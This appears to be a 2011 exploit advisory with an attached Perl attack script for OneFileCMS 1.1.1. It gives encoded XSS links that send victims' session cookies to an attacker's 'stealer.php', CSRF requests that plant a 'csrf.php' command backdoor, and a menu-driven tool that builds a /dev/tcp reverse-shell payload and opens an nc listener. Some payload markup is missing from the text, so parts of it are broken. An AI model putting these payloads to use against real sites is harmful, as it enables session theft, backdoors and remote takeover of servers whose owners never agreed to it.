# Exploit Title: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities # Google Dork: -- # Date: 21/8/2011 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr # Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip # Version: OneFileCMS v.1.1.1 # Tested on: Linux Fedora 14 =============== Description =============== OneFileCMS is just that. It's a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs. ======================================================= [!] All vulnerabilities requires authentication. [!] ======================================================= ============================================ 0x01. Cross Site Scripting vulnerability ============================================ http://VICTIM_SERVER/onefilecms/onefilecms.php?p='">

XSS Vulnerability

http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"> ----------------------------------------------------------------------------- [!] Redirection to Google through the cross site scripting vulnerability [!] ------------------------------------------------------------------------------ http://VICTIM_SERVER/onefilecms/onefilecms.php?p='">
...BUT, don't forget to encode it!!! http://localhost/onefilecms/onefilecms.php?p=27%22%3e%3c%62%6f%64%79%20%6f%6e%6c%6f%61%64%3d%22%64%6f%63%75%6d%65%6e%74%2e%70%68%69%73%69%6e%67%2e%73%75%62%6d%69%74%28%29%3b%22%3e%3c%66%6f%72%6d%20%6e%61%6d%65%3d%22%70%68%69%73%69%6e%67%22%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%22%3e%3c%2f%66%6f%72%6d%3e%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c%3e ========================================================= 0x02 Cross Site Request Foregery (CSRF) vulnerability ========================================================= --------------------------------------- [!] Steal the cookie (sessionid) [!] --------------------------------------- --- stealer.php --- --- end --- Send this link to your victim... http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"> ...BUT, don't forget to encode it first!!! http://VICTIM_SERVER/onefilecms/onefilecms.php?p=%27%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%41%54%54%41%43%4B%45%52%5F%53%45%52%56%45%52%2F%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E Now, check the "gotit.txt" file for the cookie. Replace the value of the "sessionid" with the cookie that you already grab... ------------------------------------------ [!] Create the evil file "csrf.php" [!] ------------------------------------------ http://VICTIM_SERVER/onefilecms/onefilecms.php?p='">
....enjoy the backdoor :) http://VICTIM_SERVER/onefilecms/csrf.php?cmd=[command] ------------------------------------------ [!] Delete the evil file "csrf.php" [!] ------------------------------------------ http://VICTIM_SERVER/onefilecms/onefilecms.php?p='">
#!/usr/bin/perl # # Exploit Title: OneFileCMS v.1.1.1 Remote Code Execution Exploit # Date: 22/8/2011 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr # Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip # Version: OneFileCMS v.1.1.1 # Tested on: Linux Fedora 14 use LWP::UserAgent; print "\n |==[ mr.pr0n ]=============================================== |\n"; print " | OneFileCMS 1.1.1 - [R]emote [C]ode [E]xecution [E]xploit |\n"; print " |===================[ http://ghostinthelab.wordpress.com/ ]== |\n"; print "\nEnter the target (e.g.: http://victim.com)"; print "\n> "; $target=; chomp($target); $target = "http://".$target if ($target !~ /^http:/); print "Enter the OneFileCMS directory (e.g.: onefilecms)"; print "\n> "; $dir=; chomp($dir); $target = $target."/".$dir; menu:; print "\n[+] Main Menu:\n"; print " 1. Steal the \"sessionid\" cookie.\n"; print " 2. Get a shell on your target.\n"; print " 3. Exit.\n" ; print "> "; $option=; if ($option!=1 && $option!=2 && $option!=3) { print "Oups, wrong option.\nPlease, try again.\n"; goto menu; } if ($option==1) {&cookie} if ($option==2) {&shell} if ($option==3) {&quit} sub cookie { print "Enter the address of the \"stealer.php\" (e.g.: http://attacker.com/stealer.php)"; print "\n> "; $stealer=; chomp($stealer); # ------------------------------------------------------------------------------------- # stealer.php - source code # ------------------------------------------------------------------------------------- # # -------------------------------------------------------------------------------------- $result = "'\">"; $result =~ s/(.)/sprintf("%x%",ord($1))/eg; print "\n[+] Send this link to your victim ...\n\n"; print $target."/onefilecms.php?p=".$result."\n"; goto menu; } sub shell { print "Enter the sessionid:"; print "\n> "; $sessionid=; chomp($sessionid); print "Enter the IP address for the reverse connection (e.g.: 192.168.178.25)"; print "\n> "; $ip=; chomp($ip); print "Enter the port to connect back on (e.g.: 4444)"; print "\n> "; $port=; chomp($port); $payload = " /dev/tcp/$ip/$port 0\<&1 2\>&1');". "?>"; $filename = "index_".int(rand()*1011).".php"; $csrf = "'\">". "
". "". "". "". "". "
"; $csrf =~ s/(.)/sprintf("%x%",ord($1))/eg; print "\n[+] Send this link to your victim...\n\n"; print $target."/onefilecms.php?p=".$csrf."\n"; $nc= "nc -lvp $port"; system("xterm -e $nc &"); print "\n[+] Please be patient...\n"; while (1) { $int = LWP::UserAgent->new() or die; $check=$int->get($target."/".$filename); if ($check->content =~ m/was not found/g) { sleep(10); } } goto menu; } sub quit { exit(1); }